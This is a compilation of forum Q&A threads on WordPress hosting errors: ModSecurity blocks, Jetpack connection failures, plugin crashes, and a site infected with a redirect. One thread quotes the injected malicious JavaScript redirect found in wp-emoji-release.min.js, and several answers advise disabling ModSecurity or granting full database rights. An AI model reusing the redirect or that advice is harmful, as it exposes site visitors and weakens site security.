I want to disable comments site-wide on a Wordpress site, but I keep getting this one annoying problem.
I've looked around and all of the results are for older versions of Wordpress. I have a fresh install of Wordpress 4.0 onto a namecheap hosting server.
When I try to disable comments in Settings > Discussion by unchecking the box and clicking on the submit button below, I get redirected to a page that says:
You don't have permission to access /wp/wp-admin/options.php on this
server.
Additionally, a 404 Not Found error was encountered while trying to
use an ErrorDocument to handle the request.
One suggestion from a few threads from 5-7 years ago was to modify the .htaccess and permissions. I tried, it still is returning the same error. Those suggestions were for older, less secure versions of Wordpress, so I'm thinking there should be a different workaround for 4.0. I also for some reason don't have SSH access to the server, probably because of some stupid namecheap / cpanel restriction.
I went ahead and contacted namecheap directly and they corrected it quickly - I don't think there's anything you can do. Specifically, they said:
We have whitelisted Mod Security rule which has been triggered. Please try preform necessary actions one more time.
Hope that helps.
Check your Privileges of wordpress database users.
Check also file & folder permission.
( a folder permission 755 and file permission 644 )
Related
I have a website that is running on an AWS server using the Bitnami Nginx and WordPress image.
https://www.athleticclubhk.com/
Recently it got all our ads on Google stopped due to malicious content. Oddly this time, its trickier then your standard malware of infected files. When visiting the site incognito, the first and only the first link click gets redirected using the following code:
window.location.replace("https://cartoonmines.com/scount");window.location.href = "https://cartoonmines.com/scount";
This is being injected on any link, however, upon investigating the loaded code on inspect its not injecting it into the page.
I've tried to hunt down the theme, plugins, core files and found nothing!
I replaced and reinstalled WordPress core files, deactivated all plugins and even swapped the theme - the problem is still there. I can't find any hidden .htaccess file in the entire root directory.
I even used GREP to try to look for anything fishy (any clues here that someone can help with?) nothing so far.
The site is still impacted with this so you can easily load the link ~ i do use malwarebytes to keep myself protected, incase you are opening this directly.
Can anyone help?
The redirection code is implanted to /wp-includes/js/wp-emoji-release.min.js.
How to confirm:
watch the cookies when clicking internal page, a new cookie is being set for tracking first clicks, named ht_rr
save complete webpage locally and try to load it, and check in Chrome dev tools, you'll see that in Console tab it complains about this Javascript file attempting to set the aforementioned cookie
While a temporary resolution of deleting the file will fix things for some time...
There's no excuse for not setting up a proper server stack. Bitnami or other "great stacks" won't cut it security-wise. They exist for "fast", but no "quality" setup, and of course, it's never going to be secure.
The file got created somehow / had write privileges. This indicates a problem with the setup most of the time. Unless you're using some nulled plugins or plugins from bad sources.
Once again, since the website was essentially "pwned", deleting the Javascript file does not mean complete disinfection. To preserve things in a secure state, I would recommend setting things on a clean server environment with strict PHP-FPM permissions aka "lockdown" chmod, and look for write errors to look for infected PHP files.
Check out some guides on the matter of secure NGINX/PHP-FPM setup:
NGINX and PHP-FPM. What my permissions should be?
Best practice secure NGINX configuration for WordPress
NGINX Security Headers, the right way
Just had the same problem and it was Zend Font Plugin, the same that some people mentioned before.
Installed Wordfence and this came out. Deleted the plugin and now the site is working perfectly.
Disable plugins and check again.
Change the database username and password.
Ask the hosting manager to check the host.
I have an issue in a WordPress site on Hostgator where the htaccess file keeps disappearing. Before you get all, "Check your plugins, dummy" I have the same install of this site running on a completely separate Hostgator account and it's running fine. Furthermore, I have a local instance which, again, is running fine. So if it was a plugin, the issue would be replicated on the other instances, but it's not.
My suspicion is someone who has access to the hosting account is tampering with it. While that sounds paranoid, I can't rule anything out because htaccess files don't just delete themselves.
The bandaid fix has been to just reset permalinks once the site goes down. Annoying, but simple. What might be even neat would be to set my server 404 page to a php script that, when accessed, hits an endpoint I set up in WordPress to programmatically flush the rewrite rules, thus restoring the htaccess page, and then the 404 tries to forward them on again. However, the suggestions on how to do this say putting the error page definitions in the htaccess page. Which doesn't do me much good if the htaccess page is being deleted.
How stupid is this idea? Please let me know in comments.
I'm open to other solutions, but I'm waiting on my hosting support to figure out how the file is being deleted because I assume others with the account info of tampering.
I am using Word press that Hosted on Blue Host
after activate Jetpack and when click on "connect to wordpress.com" button, i see this error:
site_inaccessible
The Jetpack server was unable to communicate with your site [HTTP 404]. Ask your web host if they allow connections from WordPress.com. If you need further assistance, contact Jetpack Support: http://jetpack.me/support/
I had this issue because I have installed iThemes Security plug-in. To solve the problem :
Disable it.
Connect JetPack
Enable it and look what exactly in the config is making the problem.
Probably other security plug-ins/firewalls will have the same effect.
The jetpack plugin error in wordpress is due to the ModSecurity is enabled in the cpanel and xmrpc rule is not added in the .htaccess file.
First diable the mod securty for the domain from cpanel.
Log into cPanel
Under Security choose ModSecurity
Under Configure Individual Domains, Switch affected On or Off (For all domains, ModSecurity is On by default)
Add xmlrpc.php requests rule in .htaccess
<Files "xmlrpc.php">
Order Allow,Deny
Allow from all
</Files>
And check xmlrpc is working or not
http://example.com/xmlrpc.php
i deactivating all plugins and uninstall jetpack , after reinstall jetpack its work successfuly. thanks for all
In your case, a security plugin or your host may be blocking access to this file. As long as this is the case, you won't be able to use Jetpack, or any other app or plugin using the XML-RPC file.
### yourblog/wordpress/xmlrpc.php
Could you try to deactivate all security plugins, and if that doesn't help to contact your hosting provider and ask them if they block access top the URL above?
Thanks,
Rahul
I have tried all types of work around and none has solved, even this above. At least with me.
What I found was, comparing with other running websites I have this one, which is a new installation had a strange folder within the same folder installation.
A folder called ".didb", I never heard of it and there was several text files within. Searched online to see if was something important to have on server, nothing clear found.
So guess what I did. Deleted the sweet folder and boom. Is working perfectly well now.
Sorry, I don't have the names of the files and folders within, and to be honest, I don't want to know, all I want to know if is the website is working with the files I want which is WordPress only.
So, you may have a similar situation, take a look under your high level folder via FTP or whichever other way you may want to and that could save the day. ;-)
I'm using wp 3.4.2 on a hosting service. I can access the ftp server and make changes using a ftp client (ie I have the correct credentials). I inherited the website and I'm trying to update everything, but as a precaution I started with the plugins.
The problem
When I try to update a plugin using the admin dashboard, after clicking "update now", the page keeps loading for several (about/at least 5) minutes. Afterwards I get a Error 503 Service Unavailable error. FTP settings are hardcoded in wp-config.php. This happens with all the plugins.
I solved it already, answer below.
In case anyone happens to stumble upon this problem, in wp-config.php the ftp host should be set to localhost instead of ftp://yourdomain.com.
Another solution i have found on my webhost was that the database user the wordpress installation used lacked the permission to refrence and to delete. Solved by giving the DB user FULL access.
I was just working on a Wordpress site and after updating a plug-in (which had not yet been activated, only installed) I activated it. Instead of the activation working, it gave me this error:
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete >your request.
Please contact the server administrator, webmaster#ibsmithmedia.com and inform them of >the time the error occurred, and anything you might have done that may have caused the >error.
More information about this error may be available in the server error log.
Additionally, a 500 Internal Server Error error was encountered while trying to use an >ErrorDocument to handle the request.
I am getting this error on every page of my wordpress site, not just the plugin page or my user admin area.
How can I fix this? Is there a way to undo this plugin activation (I'm pretty sure it's what's causing the issue).
I don't have access to the actual FTP files of the site, I'm working on it for a friend. But I can get access if that's the only way to fix this. Thanks!
I would get access and delete the plugin.
That would be the fastest solution.
I ended up having to delete the folder for the plugin and then going to my htaccess file and remove extra lines that the plugin had added there as well. That resolved the issue.
First you need to connect to your website using FTP client, or File Manager in cPanel. Once connected, you need to navigate to the /wp-content/ folder.
Inside wp-content folder, you will see a folder called plugins. This is where WordPress stores all plugins installed on your website.
Right click on the plugins folder and select Rename. Change the name of the plugins folder to anything that you like. In our example, we will call it “plugins.deactivate”. Once you do this, all of your plugins will be deactivated.
Usually, this method is used when you are locked out of your admin area. If the issue was with your plugins, then you should be able login to your WordPress admin area.
Once you do that, go back to your /wp-content/ folder and rename “plugins.deactivate” back to plugins.
Now you can activate one plugin at a time until your site breaks again. At which point, you will know exactly which plugin caused the issue.